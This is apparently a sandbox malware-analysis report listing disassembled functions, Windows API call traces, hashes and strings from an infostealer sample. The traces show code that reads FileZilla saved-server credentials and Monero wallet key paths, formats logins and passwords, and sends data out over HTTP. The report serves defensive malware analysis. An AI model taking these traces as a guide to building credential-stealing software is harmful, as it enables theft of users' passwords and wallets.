                                        • Instruction ID: 43164fdfb1d2a024f87ab0bb9bdba667e21785b6651e76445e80495c97e83f8b
                                        • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                        • Instruction Fuzzy Hash: FFA16E72E083519BD308CF25C89075BF7E2EFC8710F1ACA3DA89997294D774E9419A82
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f73c849206e13e27ebb6a0398ce09a7cfef2107afc9e31a9b76c334d8e27dab2
                                        • Instruction ID: ab40136b186e4c15b38b5f40eaacb8a4959486a17abd9da60f64f70dbf730e2f
                                        • Opcode Fuzzy Hash: f73c849206e13e27ebb6a0398ce09a7cfef2107afc9e31a9b76c334d8e27dab2
                                        • Instruction Fuzzy Hash: BC712AF3A0C3149BE3046F29EC8477AFBE6EB94720F174A3DE6C483744E67658418686
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ad016318f305594221e8e480a3ff1fc7b0bf95913380bdd8420a4c3360b86abb
                                        • Instruction ID: b498bc7523b7d4950ed1f24b54be8e417f1eddc3caf57cc01b21c680497e99ea
                                        • Opcode Fuzzy Hash: ad016318f305594221e8e480a3ff1fc7b0bf95913380bdd8420a4c3360b86abb
                                        • Instruction Fuzzy Hash: 385128F360C2009FE3046E2DDC8577AB7DAEFD8620F1A853DEAC4C7744E979A8058656
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 94dca90ca55d5375e6b9ea0ac72977e81f053a5582350e8feb34466df75b35a4
                                        • Instruction ID: 45d84993e93274af15ac33b0d839c924481c35190757dd428417da6b035676ae
                                        • Opcode Fuzzy Hash: 94dca90ca55d5375e6b9ea0ac72977e81f053a5582350e8feb34466df75b35a4
                                        • Instruction Fuzzy Hash: 7A515AF36082045FE3006E6DEC8477BBFD9DBD4320F19463DEA94C3744D63AA9168692
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                        • Instruction ID: 897f594f46128e436eb0dc98926c3470df639deb0822e77fb0571a0bd244de4d
                                        • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                        • Instruction Fuzzy Hash: C6512C62E09BD589C7058B7544502EEBFB26FE6210F1E829EC8981F383C375968DD3E5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                        • Instruction ID: 4d4380f719737e920eca18c290049424b63e8615d1407fedd07d3ef3da97591e
                                        • Opcode Fuzzy Hash: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                        • Instruction Fuzzy Hash: E5D0C9716097114FC3688F1EB440946FAE8DBD8320715C53FA09AC3750C6B094418B54
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004F8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 004F8F9B
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004FAAF6
                                          • Part of subcall function 004EA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004EA13C
                                          • Part of subcall function 004EA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004EA161
                                          • Part of subcall function 004EA110: LocalAlloc.KERNEL32(00000040,?), ref: 004EA181
                                          • Part of subcall function 004EA110: ReadFile.KERNEL32(000000FF,?,00000000,004E148F,00000000), ref: 004EA1AA
                                          • Part of subcall function 004EA110: LocalFree.KERNEL32(004E148F), ref: 004EA1E0
                                          • Part of subcall function 004EA110: CloseHandle.KERNEL32(000000FF), ref: 004EA1EA
                                          • Part of subcall function 004F8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004F8FE2
                                        • GetProcessHeap.KERNEL32(00000000,000F423F,00500DBF,00500DBE,00500DBB,00500DBA), ref: 004F04C2
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F04C9
                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 004F04E5
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00500DB7), ref: 004F04F3
                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 004F052F
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00500DB7), ref: 004F053D
                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 004F0579
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00500DB7), ref: 004F0587
                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 004F05C3
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00500DB7), ref: 004F05D5
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00500DB7), ref: 004F0662
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00500DB7), ref: 004F067A
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00500DB7), ref: 004F0692
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00500DB7), ref: 004F06AA
                                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 004F06C2
                                        • lstrcat.KERNEL32(?,profile: null), ref: 004F06D1
                                        • lstrcat.KERNEL32(?,url: ), ref: 004F06E0
                                        • lstrcat.KERNEL32(?,00000000), ref: 004F06F3
                                        • lstrcat.KERNEL32(?,00501770), ref: 004F0702
                                        • lstrcat.KERNEL32(?,00000000), ref: 004F0715
                                        • lstrcat.KERNEL32(?,00501774), ref: 004F0724
                                        • lstrcat.KERNEL32(?,login: ), ref: 004F0733
                                        • lstrcat.KERNEL32(?,00000000), ref: 004F0746
                                        • lstrcat.KERNEL32(?,00501780), ref: 004F0755
                                        • lstrcat.KERNEL32(?,password: ), ref: 004F0764
                                        • lstrcat.KERNEL32(?,00000000), ref: 004F0777
                                        • lstrcat.KERNEL32(?,00501790), ref: 004F0786
                                        • lstrcat.KERNEL32(?,00501794), ref: 004F0795
                                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00500DB7), ref: 004F07EE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                        • API String ID: 1942843190-555421843
                                        • Opcode ID: d6894f2f3e1ed371a52e522964d850dc142ff1828bc56a17d4fe208625147ee0
                                        • Instruction ID: 8bfc86319c0ec21e2c8b5e0e8a94b7ced80421aef072fe81db70349f7269e3c7
                                        • Opcode Fuzzy Hash: d6894f2f3e1ed371a52e522964d850dc142ff1828bc56a17d4fe208625147ee0
                                        • Instruction Fuzzy Hash: EFD120B190010CABCB04EBE5DD96EFE7739BF54304F008559F206B6195DF38AA58CB6A
                                        APIs
                                          • Part of subcall function 004FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004FAAF6
                                          • Part of subcall function 004E4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004E4889
                                          • Part of subcall function 004E4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 004E4899
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004E5A48
                                        • StrCmpCA.SHLWAPI(?,0145E888), ref: 004E5A63
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004E5BE3
                                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0145E728,00000000,?,0145A400,00000000,?,00501B4C), ref: 004E5EC1
                                        • lstrlen.KERNEL32(00000000), ref: 004E5ED2
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 004E5EE3
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004E5EEA
                                        • lstrlen.KERNEL32(00000000), ref: 004E5EFF
                                        • lstrlen.KERNEL32(00000000), ref: 004E5F28
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 004E5F41
                                        • lstrlen.KERNEL32(00000000,?,?), ref: 004E5F6B
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004E5F7F
                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004E5F9C
                                        • InternetCloseHandle.WININET(00000000), ref: 004E6000
                                        • InternetCloseHandle.WININET(00000000), ref: 004E600D
                                        • HttpOpenRequestA.WININET(00000000,0145E908,?,0145E208,00000000,00000000,00400100,00000000), ref: 004E5C48
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                        • InternetCloseHandle.WININET(00000000), ref: 004E6017
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                        • String ID: "$"$------$------$------
                                        • API String ID: 874700897-2180234286
                                        • Opcode ID: 5991753d041adf49b98abb0a0f58da66606bf82e5913ae5da6f304df7432e0ab
                                        • Instruction ID: 2d4a0a3920e1149c4df30c72232480f21632ca3e008b862773bc34837550b325
                                        • Opcode Fuzzy Hash: 5991753d041adf49b98abb0a0f58da66606bf82e5913ae5da6f304df7432e0ab
                                        • Instruction Fuzzy Hash: FB12EEB192011CABCB15EBA1DCA5FFE7379BF54704F00419EB20A62191DF387A58CB69
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                          • Part of subcall function 004F8CF0: GetSystemTime.KERNEL32(00500E1B,0145A610,005005B6,?,?,004E13F9,?,0000001A,00500E1B,00000000,?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004F8D16
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004ED083
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004ED1C7
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004ED1CE
                                        • lstrcat.KERNEL32(?,00000000), ref: 004ED308
                                        • lstrcat.KERNEL32(?,00501570), ref: 004ED317
                                        • lstrcat.KERNEL32(?,00000000), ref: 004ED32A
                                        • lstrcat.KERNEL32(?,00501574), ref: 004ED339
                                        • lstrcat.KERNEL32(?,00000000), ref: 004ED34C
                                        • lstrcat.KERNEL32(?,00501578), ref: 004ED35B
                                        • lstrcat.KERNEL32(?,00000000), ref: 004ED36E
                                        • lstrcat.KERNEL32(?,0050157C), ref: 004ED37D
                                        • lstrcat.KERNEL32(?,00000000), ref: 004ED390
                                        • lstrcat.KERNEL32(?,00501580), ref: 004ED39F
                                        • lstrcat.KERNEL32(?,00000000), ref: 004ED3B2
                                        • lstrcat.KERNEL32(?,00501584), ref: 004ED3C1
                                        • lstrcat.KERNEL32(?,00000000), ref: 004ED3D4
                                        • lstrcat.KERNEL32(?,00501588), ref: 004ED3E3
                                          • Part of subcall function 004FAB30: lstrlen.KERNEL32(004E4F55,?,?,004E4F55,00500DDF), ref: 004FAB3B
                                          • Part of subcall function 004FAB30: lstrcpy.KERNEL32(00500DDF,00000000), ref: 004FAB95
                                        • lstrlen.KERNEL32(?), ref: 004ED42A
                                        • lstrlen.KERNEL32(?), ref: 004ED439
                                          • Part of subcall function 004FAD80: StrCmpCA.SHLWAPI(00000000,00501568,004ED2A2,00501568,00000000), ref: 004FAD9F
                                        • DeleteFileA.KERNEL32(00000000), ref: 004ED4B4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
